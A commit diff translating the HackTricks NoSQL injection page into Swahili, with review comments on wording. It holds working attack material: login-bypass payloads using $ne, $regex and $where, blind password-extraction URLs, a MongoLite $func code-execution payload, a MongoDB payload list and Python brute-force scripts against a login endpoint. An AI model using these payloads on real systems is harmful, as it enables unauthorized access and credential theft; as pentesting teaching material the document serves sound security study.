Translated ['pentesting-web/nosql-injection.md'] to sw

This commit is contained in:
Translator 2024-03-03 09:50:53 +00:00
parent 27fd9e1294
commit 93b8f52ed6


@ -1,32 +1,33 @@
# Uvamizi wa NoSQL
# Kuingiza NoSQL
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za jamii za **kisasa zaidi** duniani.\
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia** mchakato wa kiotomatiki ulioendeshwa na zana za **jamii ya juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuingiza AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuingiza kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Kutumia udhaifu
## Kutumia
Katika PHP unaweza kutuma safu ya data kwa kubadilisha parameter iliyotumwa kutoka _parameter=foo_ hadi _parameter\[arrName]=foo._
Katika PHP unaweza kutuma Array kwa kubadilisha parameter iliyotumwa kutoka _parameter=foo_ hadi _parameter\[arrName]=foo._
Udhaifu huu unategemea kuongeza **Msimamizi**:
Mbinu za kuingiza zinategemea kuongeza **Msimamizi**:
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
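Review bot: "kuingiza" (insert/inject) is substituted for "udukuzi" (hacking) outside the page title, in the htARTE summary ("Jifunze kuhusu kuingiza AWS") and the contribution bullet ("Shiriki mbinu zako za kuingiza"), so "AWS hacking" and "hacking tricks" now read as "AWS injection" and "injection tricks"; keep "udukuzi" there and use "Kuingiza" only for the "NoSQL Injection" title. In "Mbinu za kuingiza zinategemea kuongeza **Msimamizi**", "Msimamizi" means supervisor/administrator, while the subject is a query operator such as `$ne` or `$regex`; write "opereta" or keep the English "operator" so a reader does not take it as a privileged user. The shortened heading "## Kutumia" reads as "Using"; "Kutumia udhaifu" carried the "Exploit" sense and is the better choice.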
@ -37,7 +38,7 @@ username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
### Kupitisha Uthibitishaji wa Msingi
### Kupitisha uthibitisho wa msingi
**Kutumia sio sawa ($ne) au kubwa zaidi ($gt)**
```bash
@ -52,87 +53,21 @@ username[$exists]=true&password[$exists]=true
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
### **SQL - Mongo**
#### **NoSQL Injection**
NoSQL injection is a type of vulnerability that occurs when an attacker is able to manipulate a NoSQL query in order to retrieve unauthorized data or perform unauthorized actions on a NoSQL database.
#### **NoSQL Injection Techniques**
1. **Boolean-based Injection**: This technique involves injecting a boolean expression into the query in order to determine if a specific condition is true or false. By manipulating the query, an attacker can extract sensitive information from the database.
2. **Time-based Injection**: In this technique, an attacker injects a delay into the query in order to determine if a specific condition is true or false. By measuring the time it takes for the query to execute, an attacker can extract information from the database.
3. **Error-based Injection**: This technique involves injecting a query that causes an error in order to extract information from the error message. By manipulating the query, an attacker can retrieve sensitive data from the database.
4. **Union-based Injection**: In this technique, an attacker injects a query that combines the results of two or more queries into a single result set. By manipulating the query, an attacker can retrieve data from multiple tables in the database.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection, it is important to follow these best practices:
1. **Input Validation**: Validate and sanitize all user input before using it in a NoSQL query.
2. **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is properly escaped and sanitized.
3. **Least Privilege Principle**: Limit the privileges of the database user used by the application to only what is necessary.
4. **Secure Configuration**: Ensure that the NoSQL database is properly configured and secured to prevent unauthorized access.
By following these best practices, you can significantly reduce the risk of NoSQL injection vulnerabilities in your application.
```javascript
query = { $where: `this.username == '${username}'` }
```
Mshambuliaji anaweza kutumia hili kwa kuingiza maneno kama `admin' || 'a'=='a`, kufanya swali liwarudishie nyaraka zote kwa kuridhisha hali na tautolojia (`'a'=='a'`). Hii inafanana na mashambulizi ya kuingiza SQL ambapo maneno kama `' or 1=1-- -` hutumiwa kudhibiti maswali ya SQL. Katika MongoDB, kuingizwa kama hii inaweza kufanywa kwa kutumia maneno kama `' || 1==1//`, `' || 1==1%00`, au `admin' || 'a'=='a`.
Mshambuliaji anaweza kutumia hili kwa kuingiza maneno kama `admin' || 'a'=='a`, hivyo kufanya swali kurudisha nyaraka zote kwa kutosheleza hali na tautology (`'a'=='a'`). Hii inafanana na mashambulizi ya SQL injection ambapo maneno kama `' or 1=1-- -` hutumika kudhibiti mizunguko ya SQL. Katika MongoDB, mashambulizi sawa yanaweza kufanywa kwa kutumia maneno kama `' || 1==1//`, `' || 1==1%00`, au `admin' || 'a'=='a`.
```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
```
### Pata habari ya **urefu** (length)
To extract the length information in a NoSQL injection attack, you can use the `$where` operator in MongoDB or the `regex` operator in other NoSQL databases.
#### MongoDB
In MongoDB, you can use the `$where` operator to execute JavaScript code on the server. By using the `toString()` method on the target field and checking its length, you can extract the length information.
```javascript
db.collection.find({ $where: "this.target.toString().length == 10" })
```
Replace `collection` with the name of the target collection and `target` with the name of the field you want to extract the length from. Adjust the length value (`10` in the example) according to your needs.
#### Other NoSQL Databases
In other NoSQL databases, you can use the `regex` operator to match a regular expression against the target field. By crafting a regular expression that matches a specific length, you can extract the length information.
```javascript
db.collection.find({ field: { $regex: /^.{10}$/ } })
```
Replace `collection` with the name of the target collection, `field` with the name of the field you want to extract the length from, and adjust the length value (`10` in the example) according to your needs.
Remember to test different lengths to find the correct length of the target field.
### Pata habari ya **urefu**
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
### Pata habari za **data**
Unaweza kutumia kuvuja kwa NoSQL kuchunguza na kuchota habari za data kutoka kwa programu zinazotumia teknolojia ya NoSQL. Kwa kufanya hivyo, unaweza kupata habari muhimu kama majina ya watumiaji, nywila, anwani za barua pepe, na habari nyingine ya siri.
Kuna njia kadhaa za kufanya hivyo, kulingana na aina ya kuvuja kwa NoSQL inayotumiwa na programu. Hapa kuna mifano ya njia mbili za kawaida:
#### 1. Kuvuja kwa NoSQL kwa kutumia maombi ya kawaida
Ikiwa programu inatumia maombi ya kawaida kama `find`, `findOne`, au `aggregate`, unaweza kujaribu kuvuja kwa NoSQL kwa kubadilisha maombi hayo. Kwa mfano, unaweza kujaribu kubadilisha maombi ya kawaida kuwa maombi ya kuvuja kwa NoSQL kwa kuongeza opereta ya kuvuja kama `$ne` (si sawa na) au `$regex` (kutumia kanuni za kawaida).
#### 2. Kuvuja kwa NoSQL kwa kutumia maombi ya kawaida na mchanganyiko wa maombi
Ikiwa programu inatumia mchanganyiko wa maombi ya kawaida, unaweza kujaribu kuvuja kwa NoSQL kwa kuchanganya maombi tofauti. Kwa mfano, unaweza kujaribu kuchanganya maombi ya kawaida na opereta za kuvuja kama `$ne` au `$regex` ili kupata habari ya siri.
Ni muhimu kuelewa muundo wa data na jinsi maombi yanavyofanya kazi ili uweze kubadilisha maombi kwa usahihi na kupata habari unayotafuta.
### Pata habari za **data**
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
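Review bot: "mizunguko ya SQL" in the rewritten `$where` paragraph means "SQL cycles"; the earlier "maswali ya SQL" (SQL queries) was correct, so revert that word, and pick either "tautology" or the earlier "tautolojia" rather than mixing them. Dropping the English-language filler under "### **SQL - Mongo**" and "### Pata habari ya **urefu** (length)" (the generic "NoSQL Injection Techniques" / "Preventing NoSQL Injection" lists and the `db.collection.find` length snippets, plus the Swahili "Kuvuja kwa NoSQL" paragraphs) is right, since none of it belongs to the page being translated; after the drop, check that the `query = { $where: ... }` block and the "Normal sql / Mongo sql" block still sit under the "### **SQL - Mongo**" heading and that the `password[$regex]=.{1}` block follows "### Pata habari ya **urefu**" in the new file.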
@ -151,38 +86,6 @@ in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### **SQL - Mongo**
### **SQL - Mongo**
MongoDB is a popular NoSQL database that uses a document-oriented model to store data. It is widely used in web applications and offers a flexible and scalable solution for managing large amounts of data.
#### **NoSQL Injection**
NoSQL injection is a type of attack that targets NoSQL databases, such as MongoDB, by exploiting vulnerabilities in the application's input validation. This attack allows an attacker to manipulate the database queries and potentially gain unauthorized access to sensitive data.
#### **NoSQL Injection Techniques**
1. **Boolean-based Injection**: This technique involves injecting boolean-based queries to determine if a query is true or false. By manipulating the query, an attacker can extract information from the database.
2. **Time-based Injection**: In this technique, an attacker injects time delays into the query to determine if the injected query is executed. By measuring the response time, an attacker can extract information from the database.
3. **Union-based Injection**: Union-based injection involves injecting queries that combine the results of multiple queries. By manipulating the query, an attacker can extract information from different parts of the database.
4. **Error-based Injection**: Error-based injection involves injecting queries that cause the application to generate an error message. By analyzing the error message, an attacker can extract information from the database.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection attacks, it is important to implement proper input validation and sanitization techniques. Here are some best practices:
- **Input Validation**: Validate and sanitize all user input before using it in database queries.
- **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is properly escaped and treated as data, rather than executable code.
- **Least Privilege Principle**: Limit the privileges of the database user used by the application to minimize the potential impact of an injection attack.
- **Secure Configuration**: Ensure that the database server is properly configured and updated to mitigate known vulnerabilities.
By following these best practices, you can significantly reduce the risk of NoSQL injection attacks and protect your application's data.
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
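Review bot: two consecutive "### **SQL - Mongo**" headings open this hunk, and the same heading already introduces the `$where` example earlier in the file; if both survive the change, one is a duplicate, so keep a single heading here and consider renaming it to describe the `/?search=admin' && this.password...%00` character-matching payloads it now directly precedes. Removing the English filler between the heading and the code ("MongoDB is a popular NoSQL database...", the Techniques/Preventing lists) is correct for the same reason as in the previous hunk.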
@ -194,9 +97,9 @@ By following these best practices, you can significantly reduce the risk of NoSQ
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found
```
### Utekelezaji wa Kazi Isiyohusiana na PHP
### Utekelezaji wa Kazi ya Kiholela ya PHP
Kwa kutumia operator **$func** wa maktaba ya [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) (inayotumiwa kwa chaguo-msingi), inaweza kuwa inawezekana kutekeleza kazi isiyohusiana kama ilivyo katika [ripoti hii](https://swarm.ptsecurity.com/rce-cockpit-cms/).
Kwa kutumia operator **$func** wa maktaba ya [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) (inayotumiwa kwa chaguo-msingi) inaweza kuwa inawezekana kutekeleza kazi ya kiholela kama ilivyo katika [ripoti hii](https://swarm.ptsecurity.com/rce-cockpit-cms/).
```python
"user":{"$func": "var_dump"}
```
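Review bot: the fence around `"user":{"$func": "var_dump"}` is tagged `python` although the body is a JSON fragment; since the hunk already touches the heading and sentence directly above it, retag it `json` in the same change. The new heading "Utekelezaji wa Kazi ya Kiholela ya PHP" (arbitrary PHP function execution) fixes the old "Kazi Isiyohusiana na PHP" (function unrelated to PHP), which inverted the meaning; that part is right.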
@ -204,7 +107,9 @@ Kwa kutumia operator **$func** wa maktaba ya [MongoLite](https://github.com/agen
### Pata habari kutoka kwa mkusanyiko tofauti
Inawezekana kutumia [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) kupata habari kutoka kwa mkusanyiko tofauti. Katika mfano ufuatao, tunasoma kutoka kwa **mkusanyiko tofauti** unaoitwa **`users`** na kupata **matokeo ya kuingia** yote na nenosiri linalolingana na kichujio cha wilcard.
Inawezekana kutumia [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) kupata habari kutoka kwa mkusanyiko tofauti. Katika mfano ufuatao, tunasoma kutoka kwa **mkusanyiko tofauti** uitwao **`users`** na kupata **matokeo ya kila kuingia** yenye nenosiri linalolingana na alama ya wilcard.
**TAARIFA:** `$lookup` na kazi nyingine za uagizaji zinapatikana tu ikiwa kazi ya `aggregate()` ilitumika kufanya utafutaji badala ya kazi za kawaida za `find()` au `findOne()`.
```json
[
{
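Review bot: "wilcard" is a typo for "wildcard" carried from the old sentence into the new one; fix it while the sentence is being rewritten. In the unchanged note just below, "kazi nyingine za uagizaji" does not convey "aggregation functions" ("uagizaji" is ordering/importing); keep the English "aggregation" next to `aggregate()` so the link between the `$lookup` stage and the `aggregate()` call is clear.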
@ -226,12 +131,12 @@ Inawezekana kutumia [**$lookup**](https://www.mongodb.com/docs/manual/reference/
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za jamii **zinazoendelea zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zaidi zinazotumia zana za jamii ya **juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Malipo ya MongoDB
## MongoDB Payloads
Orodha [kutoka hapa](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
```
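Review bot: the Trickest banner sentence is translated differently here ("kutumia workflows kwa urahisi zaidi", with "workflows" left in English) than in the first hunk ("kutumia mchakato wa kiotomatiki") for identical source text; use one wording for every banner in the file. Replacing "## Malipo ya MongoDB" ("MongoDB payments") with "## MongoDB Payloads" corrects a real mistranslation and is fine as is.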
@ -264,30 +169,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
## Skripti ya Blind NoSQL
### Maelezo
Blind NoSQL Injection ni aina ya shambulio ambapo mtu anajaribu kudhibiti au kupata habari kutoka kwa hifadhidata ya NoSQL. Shambulio hili linategemea udhaifu katika jinsi maombi yanavyoshughulikia maombi ya hifadhidata ya NoSQL.
### Hatua ya 1: Kuchunguza Udhaifu
Kabla ya kuanza shambulio la Blind NoSQL Injection, ni muhimu kuchunguza ikiwa maombi yanayojaribiwa yana udhaifu huu. Unaweza kufanya hivyo kwa kuchunguza majibu ya maombi na kuchunguza ikiwa kuna ishara za udhaifu wa NoSQL Injection.
### Hatua ya 2: Kugundua Muundo wa Hifadhidata
Ili kufanikisha shambulio la Blind NoSQL Injection, unahitaji kugundua muundo wa hifadhidata. Hii inaweza kufanywa kwa kutuma maombi tofauti na kuchunguza majibu ili kubaini muundo wa hifadhidata.
### Hatua ya 3: Kujenga Script ya Blind NoSQL
Baada ya kugundua muundo wa hifadhidata, unaweza kuanza kujenga skripti ya Blind NoSQL Injection. Skripti hii itatumika kudhibiti maombi na kufanya maswali ya NoSQL Injection kwa kutumia mbinu za kipofu.
### Hatua ya 4: Kutekeleza Shambulio
Hatua ya mwisho ni kutekeleza shambulio la Blind NoSQL Injection kwa kutumia skripti iliyoundwa. Shambulio hili linaweza kusababisha kupata habari nyeti kutoka kwa hifadhidata au hata kudhibiti maombi yenyewe.
### Tahadhari
Ni muhimu kutambua kuwa shambulio la Blind NoSQL Injection ni kinyume cha sheria na linaweza kusababisha madhara makubwa. Ni muhimu kufanya shambulio hili tu kwa idhini ya mmiliki wa mfumo unaolengwa na kwa madhumuni ya kujaribu usalama.
```python
import requests, string
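Review bot: the removed "Maelezo" / "Hatua ya 1..4" / "Tahadhari" text was generic filler not present in the page being translated, so dropping it is correct, but make sure the heading "## Skripti ya Blind NoSQL" itself is kept; otherwise the `import requests, string` Python block at the end of the hunk is left without a section heading.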
@ -323,9 +204,9 @@ if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
### Kuvunja nguvu majina ya mtumiaji na nywila kutoka kwa kuingia POST
### Kuvunja majina ya mtumiaji na nywila kwa kutumia POST login
Hii ni hati rahisi ambayo unaweza kubadilisha lakini zana za awali pia zinaweza kufanya kazi hii.
Hii ni script rahisi ambayo unaweza kuihariri lakini zana za awali zinaweza pia kufanya kazi hii.
```python
import requests
import string
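Review bot: the new heading "Kuvunja majina ya mtumiaji na nywila kwa kutumia POST login" loses the brute-force sense that "Kuvunja nguvu" carried and reads as "breaking usernames"; keep the loanword, e.g. "Kufanya brute-force kwa majina ya mtumiaji na nywila kupitia POST login". The body switches to "script" where the earlier text used "hati"; "skripti", already used elsewhere in this file, is the consistent choice.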
@ -383,18 +264,18 @@ get_password(u)
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia kiotomatiki** mchakato wa kazi ulioendeshwa na zana za jamii za **juu zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za **jamii yenye maendeleo zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
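Review bot: the sponsorship link reads "MIPANGO YA KUJIUNGA" in this footer but "MIPANGO YA USAJILI" in the header block of the first hunk, and the contribution bullet keeps "kudukua" (hacking) here while the header bullet was changed to "kuingiza"; the header and footer are the same source text and should read identically, with "kudukua"/"udukuzi" as the correct term. The Trickest banner here is worded a third way ("kutumia taratibu za kiotomatiki zinazotumia zana za jamii yenye maendeleo zaidi"); align it with whichever wording is chosen for the other two banners.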